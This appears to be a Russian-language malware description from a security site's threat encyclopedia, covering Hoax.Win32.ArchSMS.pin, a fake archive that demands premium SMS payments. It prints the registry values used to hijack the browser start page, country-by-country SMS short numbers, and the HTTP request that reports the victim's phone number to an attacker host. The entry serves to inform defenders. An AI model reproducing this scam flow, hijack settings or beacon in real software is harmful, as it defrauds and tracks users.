Security Lab

Hoax.Win32.ArchSMS.pin

Hoax.Win32.ArchSMS.pin

Вредоносная программа, требующая выкуп за получение содержимого зашифрованного архива, который, по мнению пользователя, содержит необходимый ему файл.

Вредоносная программа, требующая выкуп за получение содержимого зашифрованного архива, который, по мнению пользователя, содержит необходимый ему файл. Является приложением Windows (PE-EXE файл). Имеет размер 1212425 байт. Написана на C++.


name="doc3">

Деструктивная активность

После запуска троянец выполняет следующие действия:

  • создает ключи системного реестра:

  • Изменяет стартовую страницу браузера Internet Explorer, устанавливая следующие значения ключей системного реестра:
    [HKLM\Software\Microsoft\Internet Explorer\Main]
    "Default_Page_URL"="http://www.sm***xi.net"
    "Start Page"="http://www.sm***xi.net"

    [HKCU\Software\Microsoft\Internet Explorer\Main]
    "Default_Page_URL"="http://www.sm***xi.net"
    "Start Page"="http://www.sm***xi.net"
  • В своем рабочем каталоге создает файл:
    %WorkDir%\xsendexe.tmp
    и записывает в него сроку:
    est
    Троянец отображает следующее окно:

    После подтверждения пункта "Я согласен(на) с правилами", выбора места распаковки, а также нажатия на кнопку "Распаковать" – вредонос имитирует процесс распаковки файлов. На определенном этапе данный процесс останавливается и пользователю предлагается заполнить поля формы, а потом отправить СМС:

    Для других стран предлагается отправить СМС с текстом:

    43***04
    Ниже приведены страна и номер, на который нужно отправить СМС:
    Австрия 0930399999
    Бельгия 7796
    Болгария 1098
    Чехия 9090199
    Германия 80888
    Дания 1945
    Эстония 17013
    Испания 5339
    Финляндия 179479
    Франция 83868
    Венгрия 90645045
    Киргизия 1171
    Литва 1645
    Латвия 1874
    Нидерланды 7117
    Норвегия 2322
    Польша 7910
    Португалия 68305
    Швеция 72170
    Для Украины, нужно отправить СМС с текстом:
    77***01
    на номер:
    4161
    При отправке подтверждающего сообщения троянец осуществляет следующий HTTP запрос:
    GET /pass_request/?guid=3de9581b497e3ea0b9c822735a719b00
    &parid=0&xnum=
    &xid=&nomer=+7<номер телефона>m=zb&fn=&xtime=
    <rnd1>&lp=<rnd2> HTTP/1.1
    Accept: */*
    Cache-Control: no-cache
    User-Agent: Opera 10
    Host: wlnrar-auth4.net
    Connection: Keep-Alive
    где <rnd1> - произвольная числовая последовательность длинною 5 символов; <rnd2> - произвольная последовательность цифр и букв латинского алфавита. В ответ сервер возвращает некоторое целое число, например "899".

Ищем баги вместе! Но не те, что в продакшене...

Разбираем кейсы, делимся опытом, учимся на чужих ошибках

Зафиксируйте уязвимость своих знаний — подпишитесь!